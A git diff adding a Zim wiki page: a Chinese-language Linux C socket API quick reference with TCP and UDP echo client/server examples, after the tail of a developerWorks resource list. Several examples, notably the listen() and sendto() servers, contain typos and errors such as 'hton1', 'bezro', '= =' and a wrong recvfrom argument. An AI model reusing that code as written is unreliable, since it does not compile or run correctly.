The tutorial "Programming Linux sockets, Part 1" (developerWorks, October 2003) shows how to begin programming with sockets and how to build an echo server and client that connect over TCP/IP. "Programming Linux sockets, Part 2" (developerWorks, January 2004) focuses on UDP and shows how to write UDP sockets applications in C and in Python (although the code will translate well to other languages).
|
||||
|
||||
The netstat manual page provides detail on the various ways to use it.
|
||||
|
||||
BSD Sockets Programming from a Multilanguage Perspective by M. Tim Jones covers techniques in sockets programming in six different languages.
|
||||
|
||||
Find more resources for Linux developers in the developerWorks Linux zone.
|
||||
|
||||
Get products and technologies
|
||||
|
||||
The tcpdump and tcpflow utilities can be used to monitor network traffic.
|
||||
|
||||
The Ethereal network protocol analyzer provides the functionality of tcpdump but with a graphical UI and scalable plug-in architecture.
|
||||
|
||||
Order the SEK for Linux, a two-DVD set containing the latest IBM trial software for Linux from DB2®, Lotus®, Rational®, Tivoli®, and WebSphere®.
|
||||
|
||||
Build your next development project on Linux with IBM trial software, available for download directly from developerWorks.
|
||||
|
||||
|
||||
Discuss
|
||||
|
||||
Get involved in the developerWorks community by participating in developerWorks blogs.
|
||||
|
||||
810
Zim/Programme/APUE/Linux_C_Socket_Quick_Reference.txt
Normal file
@@ -0,0 +1,810 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T16:27:14+08:00
|
||||
|
||||
====== Linux C Socket Quick Reference ======
|
||||
Created 星期六 04 六月 2011
|
||||
http://cloudhe.iteye.com/blog/147467
|
||||
1. accept(接受socket连线)
|
||||
相关函数 socket,bind,listen,connect
|
||||
|
||||
表头文件 #include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
|
||||
定义函数 int accept(int s,struct sockaddr * addr,int * addrlen);
|
||||
|
||||
函数说明 accept ()用来接受参数s的socket连线。参数s的socket必需先经bind()、listen()函数处理过,当有连线进来时accept()会返回 一个新的socket处理代码,往后的数据传送与读取就是经由新的socket处理,而原来参数s的socket能继续使用accept()来接受新的连 线要求。连线成功时,参数addr所指的结构会被系统填入远程主机的地址数据,参数addrlen为scokaddr的结构长度。关于结构 sockaddr的定义请参考bind()。
|
||||
|
||||
返回值 成功则返回新的socket处理代码,失败返回-1,错误原因存于errno中。
|
||||
|
||||
错误代码
|
||||
|
||||
EBADF 参数s 非合法socket处理代码[*]EFAULT 参数addr指针指向无法存取的内存空间[*]ENOTSOCK 参数s为一文件描述词,非socket[*]EOPNOTSUPP 指定的socket并非SOCK_STREAM[*]EPERM 防火墙拒绝此连线[*]ENOBUFS 系统的缓冲内存不足[*]ENOMEM 核心内存不足
|
||||
|
||||
|
||||
范例 参考listen()。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
2. bind(对socket定位)
|
||||
相关函数 socket,accept,connect,listen
|
||||
|
||||
表头文件 #include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
|
||||
定义函数 int bind(int sockfd,struct sockaddr * my_addr,int addrlen);
|
||||
|
||||
函数说明 bind()用来设置给参数sockfd的socket一个名称。此名称由参数my_addr指向一sockaddr结构,对于不同的socket domain定义了一个通用的数据结构
|
||||
Cpp代码 收藏代码
|
||||
|
||||
struct sockaddr
|
||||
{
|
||||
unsigned short int sa_family;
|
||||
char sa_data[14];
|
||||
};
|
||||
|
||||
|
||||
sa_family 为调用socket()时的domain参数,即AF_xxxx值。
|
||||
sa_data 最多使用14个字符长度。
|
||||
此sockaddr结构会因使用不同的socket domain而有不同结构定义,例如使用AF_INET domain,其socketaddr结构定义便为
|
||||
Cpp代码 收藏代码
|
||||
|
||||
struct socketaddr_in
|
||||
{
|
||||
unsigned short int sin_family;
|
||||
uint16_t sin_port;
|
||||
struct in_addr sin_addr;
|
||||
unsigned char sin_zero[8];
|
||||
};
|
||||
struct in_addr
|
||||
{
|
||||
uint32_t s_addr;
|
||||
};
|
||||
|
||||
|
||||
sin_family 即为sa_family
|
||||
sin_port 为使用的port编号
|
||||
sin_addr.s_addr 为IP 地址
|
||||
sin_zero 未使用。
|
||||
|
||||
参数 addrlen为sockaddr的结构长度。
|
||||
|
||||
返回值 成功则返回0,失败返回-1,错误原因存于errno中。
|
||||
|
||||
错误代码
|
||||
|
||||
EBADF 参数sockfd 非合法socket处理代码[*]EACCESS 权限不足[*]ENOTSOCK 参数sockfd为一文件描述词,非socket
|
||||
|
||||
|
||||
范例 参考listen()
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
3. connect(建立socket连线)
|
||||
相关函数 socket,bind,listen
|
||||
|
||||
表头文件 #include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
|
||||
定义函数 int connect (int sockfd,struct sockaddr * serv_addr,int addrlen);
|
||||
|
||||
函数说明 connect()用来将参数sockfd 的socket 连至参数serv_addr 指定的网络地址。结构sockaddr请参考bind()。参数addrlen为sockaddr的结构长度。
|
||||
|
||||
返回值 成功则返回0,失败返回-1,错误原因存于errno中。
|
||||
|
||||
错误代码
|
||||
|
||||
EBADF 参数sockfd 非合法socket处理代码[*]EFAULT 参数serv_addr指针指向无法存取的内存空间[*]ENOTSOCK 参数sockfd为一文件描述词,非socket[*]EISCONN 参数sockfd的socket已是连线状态[*]ECONNREFUSED 连线要求被server端拒绝[*]ETIMEDOUT 企图连线的操作超过限定时间仍未有响应[*]ENETUNREACH 无法传送数据包至指定的主机[*]EAFNOSUPPORT sockaddr结构的sa_family不正确[*]EALREADY socket为不可阻断且先前的连线操作还未完成
|
||||
|
||||
|
||||
范例
|
||||
Cpp代码 收藏代码
|
||||
|
||||
/* 利用socket的TCP client
|
||||
此程序会连线TCP server,并将键盘输入的字符串传送给server。
|
||||
TCP server范例请参考listen()。
|
||||
*/
|
||||
#include<sys/stat.h>
|
||||
#include<fcntl.h>
|
||||
#include<unistd.h>
|
||||
#include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
#include<netinet/in.h>
|
||||
#include<arpa/inet.h>
|
||||
#define PORT 1234
|
||||
#define SERVER_IP “127.0.0.1”
|
||||
|
||||
main()
|
||||
{
|
||||
int s;
|
||||
struct sockaddr_in addr;
|
||||
char buffer[256];
|
||||
if((s = socket(AF_INET,SOCK_STREAM,0))<0){
|
||||
perror(“socket”);
|
||||
exit(1);
|
||||
}
|
||||
/* 填写sockaddr_in结构*/
|
||||
bzero(&addr,sizeof(addr));
|
||||
addr.sin_family = AF_INET;
|
||||
addr.sin_port=htons(PORT);
|
||||
addr.sin_addr.s_addr = inet_addr(SERVER_IP);
|
||||
/* 尝试连线*/
|
||||
if(connect(s,&addr,sizeof(addr))<0){
|
||||
perror(“connect”);
|
||||
exit(1);
|
||||
}
|
||||
/* 接收由server端传来的信息*/
|
||||
recv(s,buffer,sizeof(buffer),0);
|
||||
printf(“%s\n”,buffer);
|
||||
while(1){
|
||||
bzero(buffer,sizeof(buffer));
|
||||
/* 从标准输入设备取得字符串*/
|
||||
read(STDIN_FILENO,buffer,sizeof(buffer));
|
||||
/* 将字符串传给server端*/
|
||||
if(send(s,buffer,sizeof(buffer),0)<0){
|
||||
perror(“send”);
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
执行 $ ./connect
|
||||
Welcome to server!
|
||||
hi I am client! /*键盘输入*/
|
||||
/*<Ctrl+C>中断程序*/
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
4. endprotoent(结束网络协议数据的读取)
|
||||
相关函数 getprotoent,getprotobyname,getprotobynumber,setprotoent
|
||||
|
||||
表头文件 #include<netdb.h>
|
||||
|
||||
定义函数 void endprotoent(void);
|
||||
|
||||
函数说明 endprotoent()用来关闭由getprotoent()打开的文件。
|
||||
|
||||
返回值
|
||||
|
||||
范例 参考getprotoent()
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
5. endservent(结束网络服务数据的读取)
|
||||
相关函数 getservent,getservbyname,getservbyport,setservent
|
||||
|
||||
表头文件 #include<netdb.h>
|
||||
|
||||
定义函数 void endservent(void);
|
||||
|
||||
函数说明 endservent()用来关闭由getservent()所打开的文件。
|
||||
|
||||
返回值
|
||||
|
||||
范例 参考getservent()。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
6. getsockopt(取得socket状态)
|
||||
相关函数 setsockopt
|
||||
|
||||
表头文件 #include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
|
||||
定义函数 int getsockopt(int s,int level,int optname,void* optval,socklen_t* optlen);
|
||||
|
||||
函数说明 getsockopt()会将参数s所指定的socket状态返回。参数optname代表欲取得何种选项状态,而参数optval则指向欲保存结果的内存地址,参数optlen则为该空间的大小。参数level、optname请参考setsockopt()。
|
||||
|
||||
返回值 成功则返回0,若有错误则返回-1,错误原因存于errno
|
||||
|
||||
错误代码
|
||||
|
||||
EBADF 参数s 并非合法的socket处理代码[*]ENOTSOCK 参数s为一文件描述词,非socket[*]ENOPROTOOPT 参数optname指定的选项不正确[*]EFAULT 参数optval指针指向无法存取的内存空间
|
||||
|
||||
|
||||
范例
|
||||
Cpp代码 收藏代码
|
||||
|
||||
#include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
main()
|
||||
{
|
||||
int s,optval,optlen = sizeof(int);
|
||||
if((s = socket(AF_INET,SOCK_STREAM,0))<0)
|
||||
perror(“socket”);
|
||||
getsockopt(s,SOL_SOCKET,SO_TYPE,&optval,&optlen);
|
||||
printf(“optval = %d\n”,optval);
|
||||
close(s);
|
||||
}
|
||||
|
||||
|
||||
执行 optval = 1 /*SOCK_STREAM的定义正是此值*/
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
7. htonl(将32位主机字符顺序转换成网络字符顺序)
|
||||
相关函数 htons,ntohl,ntohs
|
||||
|
||||
表头文件 #include<netinet/in.h>
|
||||
|
||||
定义函数 unsigned long int htonl(unsigned long int hostlong);
|
||||
|
||||
函数说明 htonl()用来将参数指定的32位hostlong 转换成网络字符顺序。
|
||||
|
||||
返回值 返回对应的网络字符顺序。
|
||||
|
||||
范例 参考getservbyport()或connect()。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
8. htons(将16位主机字符顺序转换成网络字符顺序)
|
||||
相关函数 htonl,ntohl,ntohs
|
||||
|
||||
表头文件 #include<netinet/in.h>
|
||||
|
||||
定义函数 unsigned short int htons(unsigned short int hostshort);
|
||||
|
||||
函数说明 htons()用来将参数指定的16位hostshort转换成网络字符顺序。
|
||||
|
||||
返回值 返回对应的网络字符顺序。
|
||||
|
||||
范例 参考connect()。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
9. inet_addr(将网络地址转成二进制的数字)
|
||||
相关函数 inet_aton,inet_ntoa
|
||||
|
||||
表头文件 #include<sys/socket.h>
|
||||
#include<netinet/in.h>
|
||||
#include<arpa/inet.h>
|
||||
|
||||
定义函数 unsigned long int inet_addr(const char *cp);
|
||||
|
||||
函数说明 inet_addr()用来将参数cp所指的网络地址字符串转换成网络所使用的二进制数字。网络地址字符串是以数字和点组成的字符串,例如:“163.13.132.68”。
|
||||
|
||||
返回值 成功则返回对应的网络二进制的数字,失败返回-1。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
10. inet_aton(将网络地址转成网络二进制的数字)
|
||||
相关函数 inet_addr,inet_ntoa
|
||||
|
||||
表头文件 #include<sys/scoket.h>
|
||||
#include<netinet/in.h>
|
||||
#include<arpa/inet.h>
|
||||
|
||||
定义函数 int inet_aton(const char * cp,struct in_addr *inp);
|
||||
|
||||
函数说明 inet_aton()用来将参数cp所指的网络地址字符串转换成网络使用的二进制的数字,然后存于参数inp所指的in_addr结构中。
|
||||
结构in_addr定义如下
|
||||
Cpp代码 收藏代码
|
||||
|
||||
struct in_addr
|
||||
{
|
||||
unsigned long int s_addr;
|
||||
};
|
||||
|
||||
|
||||
|
||||
返回值 成功则返回非0值,失败则返回0。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
11. inet_ntoa(将网络二进制的数字转换成网络地址)
|
||||
相关函数 inet_addr,inet_aton
|
||||
|
||||
表头文件 #include<sys/socket.h>
|
||||
#include<netinet/in.h>
|
||||
#include<arpa/inet.h>
|
||||
|
||||
定义函数 char * inet_ntoa(struct in_addr in);
|
||||
|
||||
函数说明 inet_ntoa()用来将参数in所指的网络二进制的数字转换成网络地址,然后将指向此网络地址字符串的指针返回。
|
||||
|
||||
返回值 成功则返回字符串指针,失败则返回NULL。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
12. listen(等待连接)
|
||||
相关函数 socket,bind,accept,connect
|
||||
|
||||
表头文件 #include<sys/socket.h>
|
||||
|
||||
定义函数 int listen(int s,int backlog);
|
||||
|
||||
函数说明 listen ()用来等待参数s 的socket连线。参数backlog指定同时能处理的最大连接要求,如果连接数目达此上限则client端将收到ECONNREFUSED的错误。 Listen()并未开始接收连线,只是设置socket为listen模式,真正接收client端连线的是accept()。通常listen()会 在socket(),bind()之后调用,接着才调用accept()。
|
||||
|
||||
返回值 成功则返回0,失败返回-1,错误原因存于errno
|
||||
|
||||
附加说明 listen()只适用SOCK_STREAM或SOCK_SEQPACKET的socket类型。如果socket为AF_INET则参数backlog 最大值可设至128。
|
||||
|
||||
错误代码
|
||||
|
||||
EBADF 参数sockfd非合法socket处理代码[*]EACCESS 权限不足[*]EOPNOTSUPP 指定的socket并未支援listen模式
|
||||
|
||||
|
||||
范例
|
||||
Cpp代码 收藏代码
|
||||
|
||||
#include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
#include<netinet/in.h>
|
||||
#include<arpa/inet.h>
|
||||
#include<unistd.h>
|
||||
#define PORT 1234
|
||||
#define MAXSOCKFD 10
|
||||
main()
|
||||
{
|
||||
int sockfd,newsockfd,is_connected[MAXSOCKFD],fd;
|
||||
struct sockaddr_in addr;
|
||||
int addr_len = sizeof(struct sockaddr_in);
|
||||
fd_set readfds;
|
||||
char buffer[256];
|
||||
char msg[ ] =”Welcome to server!”;
|
||||
if ((sockfd = socket(AF_INET,SOCK_STREAM,0))<0){
|
||||
perror(“socket”);
|
||||
exit(1);
|
||||
}
|
||||
bzero(&addr,sizeof(addr));
|
||||
addr.sin_family =AF_INET;
|
||||
addr.sin_port = htons(PORT);
|
||||
addr.sin_addr.s_addr = htonl(INADDR_ANY);
|
||||
if(bind(sockfd,&addr,sizeof(addr))<0){
|
||||
perror(“connect”);
|
||||
exit(1);
|
||||
}
|
||||
if(listen(sockfd,3)<0){
|
||||
perror(“listen”);
|
||||
exit(1);
|
||||
}
|
||||
for(fd=0;fd<MAXSOCKFD;fd++)
|
||||
is_connected[fd]=0;
|
||||
while(1){
|
||||
FD_ZERO(&readfds);
|
||||
FD_SET(sockfd,&readfds);
|
||||
for(fd=0;fd<MAXSOCKFD;fd++)
|
||||
if(is_connected[fd])
|
||||
FD_SET(fd,&readfds);
|
||||
if(!select(MAXSOCKFD,&readfds,NULL,NULL,NULL))
|
||||
continue;
|
||||
for(fd=0;fd<MAXSOCKFD;fd++)
|
||||
if(FD_ISSET(fd,&readfds)){
|
||||
if(sockfd = =fd){
|
||||
if((newsockfd = accept (sockfd,&addr,&addr_len))<0)
|
||||
perror(“accept”);
|
||||
write(newsockfd,msg,sizeof(msg));
|
||||
is_connected[newsockfd] =1;
|
||||
printf(“cnnect from %s\n”,inet_ntoa(addr.sin_addr));
|
||||
}else{
|
||||
bzero(buffer,sizeof(buffer));
|
||||
if(read(fd,buffer,sizeof(buffer))<=0){
|
||||
printf(“connect closed.\n”);
|
||||
is_connected[fd]=0;
|
||||
close(fd);
|
||||
}else
|
||||
printf(“%s”,buffer);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
执行 $ ./listen
|
||||
connect from 127.0.0.1
|
||||
hi I am client
|
||||
connected closed.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
13. ntohl(将32位网络字符顺序转换成主机字符顺序)
|
||||
相关函数 htonl,htons,ntohs
|
||||
|
||||
表头文件 #include<netinet/in.h>
|
||||
|
||||
定义函数 unsigned long int ntohl(unsigned long int netlong);
|
||||
|
||||
函数说明 ntohl()用来将参数指定的32位netlong转换成主机字符顺序。
|
||||
|
||||
返回值 返回对应的主机字符顺序。
|
||||
|
||||
范例 参考getservent()。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
14. ntohs(将16位网络字符顺序转换成主机字符顺序)
|
||||
相关函数 htonl,htons,ntohl
|
||||
|
||||
表头文件 #include<netinet/in.h>
|
||||
|
||||
定义函数 unsigned short int ntohs(unsigned short int netshort);
|
||||
|
||||
函数说明 ntohs()用来将参数指定的16位netshort转换成主机字符顺序。
|
||||
|
||||
返回值 返回对应的主机顺序。
|
||||
|
||||
范例 参考getservent()。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
15. recv(经socket接收数据)
|
||||
相关函数 recvfrom,recvmsg,send,sendto,socket
|
||||
|
||||
表头文件 #include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
|
||||
定义函数 int recv(int s,void *buf,int len,unsigned int flags);
|
||||
|
||||
函数说明 recv()用来接收远端主机经指定的socket传来的数据,并把数据存到由参数buf 指向的内存空间,参数len为可接收数据的最大长度。
|
||||
|
||||
参数 flags一般设0。其他数值定义如下:
|
||||
|
||||
MSG_OOB 接收以out-of-band 送出的数据[*]MSG_PEEK 返回来的数据并不会在系统内删除,如果再调用recv()会返回相同的数据内容[*]MSG_WAITALL强迫接收到len大小的数据后才能返回,除非有错误或信号产生[*]MSG_NOSIGNAL此操作不愿被SIGPIPE信号中断返回值成功则返回接收到的字符数,失败返回-1,错误原因存于errno中
|
||||
|
||||
|
||||
错误代码
|
||||
|
||||
EBADF 参数s非合法的socket处理代码[*]EFAULT 参数中有一指针指向无法存取的内存空间[*]ENOTSOCK 参数s为一文件描述词,非socket[*]EINTR 被信号所中断[*]EAGAIN 此动作会令进程阻断,但参数s的socket为不可阻断[*]ENOBUFS 系统的缓冲内存不足[*]ENOMEM 核心内存不足[*]EINVAL 传给系统调用的参数不正确
|
||||
|
||||
|
||||
范例 参考listen()。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
16. recvfrom(经socket接收数据)
|
||||
相关函数 recv,recvmsg,send,sendto,socket
|
||||
|
||||
表头文件 #include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
|
||||
定义函数 int recvfrom(int s,void *buf,int len,unsigned int flags ,struct sockaddr *from ,int *fromlen);
|
||||
|
||||
函数说明 recv ()用来接收远程主机经指定的socket 传来的数据,并把数据存到由参数buf 指向的内存空间,参数len 为可接收数据的最大长度。参数flags 一般设0,其他数值定义请参考recv()。参数from用来指定欲传送的网络地址,结构sockaddr 请参考bind()。参数fromlen为sockaddr的结构长度。
|
||||
|
||||
返回值 成功则返回接收到的字符数,失败则返回-1,错误原因存于errno中。
|
||||
|
||||
错误代码
|
||||
|
||||
EBADF 参数s非合法的socket处理代码[*]EFAULT 参数中有一指针指向无法存取的内存空间[*]ENOTSOCK 参数s为一文件描述词,非socket[*]EINTR 被信号所中断[*]EAGAIN 此动作会令进程阻断,但参数s的socket为不可阻断[*]ENOBUFS 系统的缓冲内存不足[*]ENOMEM 核心内存不足[*]EINVAL 传给系统调用的参数不正确
|
||||
|
||||
|
||||
范例
|
||||
Cpp代码 收藏代码
|
||||
|
||||
/*利用socket的UDP client
|
||||
此程序会连线UDP server,并将键盘输入的字符串传给server。
|
||||
UDP server 范例请参考sendto()
|
||||
*/
|
||||
#include<sys/stat.h>
|
||||
#include<fcntl.h>
|
||||
#include<unistd.h>
|
||||
#include<sys/typs.h>
|
||||
#include<sys/socket.h>
|
||||
#include<netinet/in.h>
|
||||
#include<arpa/inet.h>
|
||||
#define PORT 2345
|
||||
#define SERVER_IP “127.0.0.1”
|
||||
main()
|
||||
{
|
||||
int s,len;
|
||||
struct sockaddr_in addr;
|
||||
int addr_len =sizeof(struct sockaddr_in);
|
||||
char buffer[256];
|
||||
/* 建立socket*/
|
||||
if((s = socket(AF_INET,SOCK_DGRAM,0))<0){
|
||||
perror(“socket”);
|
||||
exit(1);
|
||||
}
|
||||
/* 填写sockaddr_in*/
|
||||
bzero(&addr,sizeof(addr));
|
||||
addr.sin_family = AF_INET;
|
||||
addr.sin_port = htons(PORT);
|
||||
addr.sin_addr.s_addr = inet_addr(SERVER_IP);
|
||||
while(1){
|
||||
bzero(buffer,sizeof(buffer));
|
||||
/* 从标准输入设备取得字符串*/
|
||||
len =read(STDIN_FILENO,buffer,sizeof(buffer));
|
||||
/* 将字符串传送给server端*/
|
||||
sendto(s,buffer,len,0,&addr,addr_len);
|
||||
/* 接收server端返回的字符串*/
|
||||
len = recvfrom(s,buffer,sizeof(buffer),0,&addr,&addr_len);
|
||||
printf(“receive: %s”,buffer);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
执行 (先执行udp server 再执行udp client)
|
||||
hello /*从键盘输入字符串*/
|
||||
receive: hello /*server端返回来的字符串*/
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
17. recvmsg(经socket接收数据)
|
||||
相关函数 recv,recvfrom,send,sendto,sendmsg,socket
|
||||
|
||||
表头文件 #include<sys/types.h>
|
||||
#include<sys/socktet.h>
|
||||
|
||||
定义函数 int recvmsg(int s,struct msghdr *msg,unsigned int flags);
|
||||
|
||||
函数说明 recvmsg ()用来接收远程主机经指定的socket传来的数据。参数s为已建立好连线的socket,如果利用UDP协议则不需经过连线操作。参数msg指向欲连 线的数据结构内容,参数flags一般设0,详细描述请参考send()。关于结构msghdr的定义请参考sendmsg()。
|
||||
|
||||
返回值 成功则返回接收到的字符数,失败则返回-1,错误原因存于errno中。
|
||||
|
||||
错误代码
|
||||
|
||||
EBADF 参数s非合法的socket处理代码[*]EFAULT 参数中有一指针指向无法存取的内存空间[*]ENOTSOCK 参数s为一文件描述词,非socket[*]EINTR 被信号所中断[*]EAGAIN 此操作会令进程阻断,但参数s的socket为不可阻断[*]ENOBUFS 系统的缓冲内存不足[*]ENOMEM 核心内存不足[*]EINVAL 传给系统调用的参数不正确
|
||||
|
||||
|
||||
范例 参考recvfrom()。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
18. send(经socket传送数据)
|
||||
相关函数 sendto,sendmsg,recv,recvfrom,socket
|
||||
|
||||
表头文件 #include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
|
||||
定义函数 int send(int s,const void * msg,int len,unsigned int falgs);
|
||||
|
||||
函数说明 send()用来将数据由指定的socket 传给对方主机。参数s为已建立好连接的socket。参数msg指向欲连线的数据内容,参数len则为数据长度。参数flags一般设0,其他数值定义如下
|
||||
MSG_OOB 传送的数据以out-of-band 送出。
|
||||
MSG_DONTROUTE 取消路由表查询
|
||||
MSG_DONTWAIT 设置为不可阻断运作
|
||||
MSG_NOSIGNAL 此动作不愿被SIGPIPE 信号中断。
|
||||
|
||||
返回值 成功则返回实际传送出去的字符数,失败返回-1。错误原因存于errno
|
||||
|
||||
错误代码
|
||||
|
||||
EBADF 参数s 非合法的socket处理代码[*]EFAULT 参数中有一指针指向无法存取的内存空间[*]ENOTSOCK 参数s为一文件描述词,非socket[*]EINTR 被信号所中断[*]EAGAIN 此操作会令进程阻断,但参数s的socket为不可阻断[*]ENOBUFS 系统的缓冲内存不足[*]ENOMEM 核心内存不足[*]EINVAL 传给系统调用的参数不正确
|
||||
|
||||
|
||||
范例 参考connect()
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
19. sendmsg(经socket传送数据)
|
||||
相关函数 send,sendto,recv,recvfrom,recvmsg,socket
|
||||
|
||||
表头文件 #include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
|
||||
定义函数 int sendmsg(int s,const strcut msghdr *msg,unsigned int flags);
|
||||
|
||||
函数说明 sendmsg()用来将数据由指定的socket传给对方主机。参数s为已建立好连线的socket,如果利用UDP协议则不需经过连线操作。参数msg 指向欲连线的数据结构内容,参数flags一般默认为0,详细描述请参考send()。
|
||||
结构msghdr定义如下
|
||||
Cpp代码 收藏代码
|
||||
|
||||
struct msghdr
|
||||
{
|
||||
void *msg_name; /*Address to send to /receive from . */
|
||||
socklen_t msg_namelen; /* Length of addres data */
|
||||
strcut iovec * msg_iov; /* Vector of data to send/receive into */
|
||||
size_t msg_iovlen; /* Number of elements in the vector */
|
||||
void * msg_control; /* Ancillary dat */
|
||||
size_t msg_controllen; /* Ancillary data buffer length */
|
||||
int msg_flags; /* Flags on received message */
|
||||
};
|
||||
|
||||
|
||||
|
||||
返回值 成功则返回实际传送出去的字符数,失败返回-1,错误原因存于errno
|
||||
|
||||
错误代码
|
||||
|
||||
EBADF 参数s 非合法的socket处理代码[*]EFAULT 参数中有一指针指向无法存取的内存空间[*]ENOTSOCK 参数s为一文件描述词,非socket[*]EINTR 被信号所中断[*]EAGAIN 此操作会令进程阻断,但参数s的socket为不可阻断[*]ENOBUFS 系统的缓冲内存不足[*]ENOMEM 核心内存不足[*]EINVAL 传给系统调用的参数不正确
|
||||
|
||||
|
||||
范例 参考sendto()。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
20. sendto(经socket传送数据)
|
||||
相关函数 send , sendmsg,recv , recvfrom , socket
|
||||
|
||||
表头文件 #include < sys/types.h >
|
||||
#include < sys/socket.h >
|
||||
|
||||
定义函数 int sendto ( int s , const void * msg, int len, unsigned int flags, const
|
||||
struct sockaddr * to , int tolen ) ;
|
||||
|
||||
函数说明 sendto() 用来将数据由指定的socket传给对方主机。参数s为已建好连线的socket,如果利用UDP协议则不需经过连线操作。参数msg指向欲连线的数据内 容,参数flags 一般设0,详细描述请参考send()。参数to用来指定欲传送的网络地址,结构sockaddr请参考bind()。参数tolen为sockaddr 的结果长度。
|
||||
|
||||
返回值 成功则返回实际传送出去的字符数,失败返回-1,错误原因存于errno 中。
|
||||
|
||||
错误代码
|
||||
|
||||
EBADF 参数s非法的socket处理代码[*]EFAULT 参数中有一指针指向无法存取的内存空间[*]WNOTSOCK canshu s为一文件描述词,非socket[*]EINTR 被信号所中断[*]EAGAIN 此动作会令进程阻断,但参数s的soket为补课阻断的[*]ENOBUFS 系统的缓冲内存不足[*]EINVAL 传给系统调用的参数不正确
|
||||
|
||||
|
||||
范例
|
||||
Cpp代码 收藏代码
|
||||
|
||||
#include < sys/types.h >
|
||||
#include < sys/socket.h >
|
||||
#include <netinet.in.h>
|
||||
#include <arpa.inet.h>
|
||||
#define PORT 2345 /*使用的port*/
|
||||
main()
|
||||
{
|
||||
int sockfd,len;
|
||||
struct sockaddr_in addr;
|
||||
char buffer[256];
|
||||
/*建立socket*/
|
||||
if(sockfd=socket (AF_INET,SOCK_DGRAM,0))<0){
|
||||
perror (“socket”);
|
||||
exit(1);
|
||||
}
|
||||
/*填写sockaddr_in 结构*/
|
||||
bzero(&addr, sizeof(addr) );
|
||||
addr.sin_family=AF_INET;
|
||||
addr.sin_port=htons(PORT);
|
||||
addr.sin_addr=hton1(INADDR_ANY) ;
|
||||
if (bind(sockfd, &addr, sizeof(addr))<0){
|
||||
perror(“connect”);
|
||||
exit(1);
|
||||
}
|
||||
while(1){
|
||||
bezro(buffer,sizeof(buffer));
|
||||
len = recvfrom(socket,buffer,sizeof(buffer), 0 , &addr &addr_len);
|
||||
/*显示client端的网络地址*/
|
||||
printf(“receive from %s\n “ , inet_ntoa( addr.sin_addr));
|
||||
/*将字串返回给client端*/
|
||||
sendto(sockfd,buffer,len,0,&addr,addr_len);”
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
执行 请参考recvfrom()
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
21. setprotoent(打开网络协议的数据文件)
|
||||
相关函数 getprotobyname, getprotobynumber, endprotoent
|
||||
|
||||
表头文件 #include <netdb.h>
|
||||
|
||||
定义函数 void setprotoent (int stayopen);
|
||||
|
||||
函数说明 setprotoent()用来打开/etc/protocols, 如果参数stayopen值为1,则接下来的getprotobyname()或getprotobynumber()将不会自动关闭此文件。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
22. setservent(打开主机网络服务的数据文件)
|
||||
相关函数 getservent, getservbyname, getservbyport, endservent
|
||||
|
||||
表头文件 #include < netdb.h >
|
||||
|
||||
定义函数 void setservent (int stayopen);
|
||||
|
||||
函数说明 setservent()用来打开/etc/services,如果参数stayopen值为1,则接下来的getservbyname()或getservbyport()将补回自动关闭文件。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
23. setsockopt(设置socket状态)
|
||||
相关函数 getsockopt
|
||||
|
||||
表头文件 #include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
|
||||
定义函数 int setsockopt(int s,int level,int optname,const void * optval,,socklen_toptlen);
|
||||
|
||||
函数说明 setsockopt()用来设置参数s所指定的socket状态。参数level代表欲设置的网络层,一般设成SOL_SOCKET以存取socket层。参数optname代表欲设置的选项,有下列几种数值:
|
||||
|
||||
SO_DEBUG 打开或关闭排错模式[*]SO_REUSEADDR 允许在bind()过程中本地地址可重复使用[*]SO_TYPE 返回socket形态[*]SO_ERROR 返回socket已发生的错误原因[*]SO_DONTROUTE 送出的数据包不要利用路由设备来传输[*]SO_BROADCAST 使用广播方式传送[*]SO_SNDBUF 设置送出的暂存区大小[*]SO_RCVBUF 设置接收的暂存区大小[*]SO_KEEPALIVE 定期确定连线是否已终止[*]SO_OOBINLINE 当接收到OOB 数据时会马上送至标准输入设备[*]SO_LINGER 确保数据安全且可靠的传送出去
|
||||
|
||||
|
||||
参数 optval代表欲设置的值,参数optlen则为optval的长度。
|
||||
|
||||
返回值 成功则返回0,若有错误则返回-1,错误原因存于errno。
|
||||
|
||||
附加说明 EBADF 参数s并非合法的socket处理代码
|
||||
ENOTSOCK 参数s为一文件描述词,非socket
|
||||
ENOPROTOOPT 参数optname指定的选项不正确。
|
||||
